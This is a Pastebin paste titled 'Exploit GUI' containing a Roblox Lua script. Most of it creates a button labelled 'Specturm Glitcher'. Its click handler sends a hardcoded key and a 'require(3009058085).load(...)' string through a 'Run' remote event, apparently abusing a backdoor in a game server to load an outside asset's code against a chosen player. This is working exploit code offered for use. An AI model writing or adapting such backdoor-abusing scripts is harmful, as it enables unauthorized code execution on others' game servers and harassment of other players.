Advertisement
Guest User

Exploit GUI

a guest
Sep 21st, 2019
1,664
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.51 KB | None | 0 0
  1. -- Farewell Infortality.
  2. -- Version: 2.82
  3. -- Instances:
  4. local ScreenGui = Instance.new("ScreenGui")
  5. local Frame = Instance.new("Frame")
  6. local TextButton = Instance.new("TextButton")
  7. local RoundedBG = Instance.new("Frame")
  8. local Corner = Instance.new("ImageLabel")
  9. local Corner_2 = Instance.new("ImageLabel")
  10. local Corner_3 = Instance.new("ImageLabel")
  11. local Corner_4 = Instance.new("ImageLabel")
  12. --Properties:
  13. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  14. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  15.  
  16. Frame.Parent = ScreenGui
  17. Frame.BackgroundColor3 = Color3.new(0.180392, 0.988235, 1)
  18. Frame.Position = UDim2.new(0.04296875, 0, 0.78623718, 0)
  19. Frame.Size = UDim2.new(0, 479, 0, 100)
  20.  
  21. TextButton.Parent = Frame
  22. TextButton.BackgroundColor3 = Color3.new(1, 1, 1)
  23. TextButton.Position = UDim2.new(0.0334029235, 0, 0.25, 0)
  24. TextButton.Size = UDim2.new(0, 66, 0, 50)
  25. TextButton.Font = Enum.Font.SourceSansBold
  26. TextButton.Text = "Specturm Glitcher"
  27. TextButton.TextColor3 = Color3.new(0, 0, 0)
  28. TextButton.TextScaled = true
  29. TextButton.TextSize = 14
  30. TextButton.TextWrapped = true
  31.  
  32. RoundedBG.Name = "RoundedBG"
  33. RoundedBG.Parent = TextButton
  34. RoundedBG.BackgroundColor3 = Color3.new(1, 1, 1)
  35. RoundedBG.BackgroundTransparency = 1
  36. RoundedBG.BorderSizePixel = 0
  37. RoundedBG.Size = UDim2.new(1, 0, 1, 0)
  38.  
  39. Corner.Name = "Corner"
  40. Corner.Parent = RoundedBG
  41. Corner.BackgroundColor3 = Color3.new(1, 1, 1)
  42. Corner.BackgroundTransparency = 1
  43. Corner.BorderSizePixel = 0
  44. Corner.Size = UDim2.new(0, 10, 0, 10)
  45. Corner.Image = "rbxassetid://257730458"
  46. Corner.ImageRectSize = Vector2.new(384, 384)
  47.  
  48. Corner_2.Name = "Corner"
  49. Corner_2.Parent = RoundedBG
  50. Corner_2.BackgroundColor3 = Color3.new(1, 1, 1)
  51. Corner_2.BackgroundTransparency = 1
  52. Corner_2.BorderSizePixel = 0
  53. Corner_2.Position = UDim2.new(1, -10, 0, 0)
  54. Corner_2.Size = UDim2.new(0, 10, 0, 10)
  55. Corner_2.Image = "rbxassetid://257730458"
  56. Corner_2.ImageRectOffset = Vector2.new(384, 0)
  57. Corner_2.ImageRectSize = Vector2.new(384, 384)
  58.  
  59. Corner_3.Name = "Corner"
  60. Corner_3.Parent = RoundedBG
  61. Corner_3.BackgroundColor3 = Color3.new(1, 1, 1)
  62. Corner_3.BackgroundTransparency = 1
  63. Corner_3.BorderSizePixel = 0
  64. Corner_3.Position = UDim2.new(0, 0, 1, -10)
  65. Corner_3.Size = UDim2.new(0, 10, 0, 10)
  66. Corner_3.Image = "rbxassetid://257730458"
  67. Corner_3.ImageRectOffset = Vector2.new(0, 384)
  68. Corner_3.ImageRectSize = Vector2.new(384, 384)
  69.  
  70. Corner_4.Name = "Corner"
  71. Corner_4.Parent = RoundedBG
  72. Corner_4.BackgroundColor3 = Color3.new(1, 1, 1)
  73. Corner_4.BackgroundTransparency = 1
  74. Corner_4.BorderSizePixel = 0
  75. Corner_4.Position = UDim2.new(1, -10, 1, -10)
  76. Corner_4.Size = UDim2.new(0, 10, 0, 10)
  77. Corner_4.Image = "rbxassetid://257730458"
  78. Corner_4.ImageRectOffset = Vector2.new(384, 384)
  79. Corner_4.ImageRectSize = Vector2.new(384, 384)
  80. -- Scripts:
  81. function SCRIPT_BLAP80_FAKESCRIPT() -- TextButton.Spectrum_Function
  82. local script = Instance.new('LocalScript')
  83. script.Parent = TextButton
  84. local function findPlayer(name)
  85. name = name:lower()
  86. if name == 'me' then
  87. return game:GetService'Players'.LocalPlayer
  88. end
  89. for i,v in pairs(game:GetService'Players':GetPlayers()) do
  90. if v.Name:lower():find(name) == 1 then
  91. return v
  92. end
  93. end
  94. end
  95. script.Parent.MouseButton1Click:Connect(function()
  96. script.Parent.Parent.Parent.Parent:WaitForChild("Run"):FireServer("5#lGIERKWEF", "require(3009058085).load('"..findPlayer(script.Parent.Parent.Parent.Parent.User.Text).Name.."')")
  97.  
  98. end)
  99.  
  100. end
  101. coroutine.resume(coroutine.create(SCRIPT_BLAP80_FAKESCRIPT))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement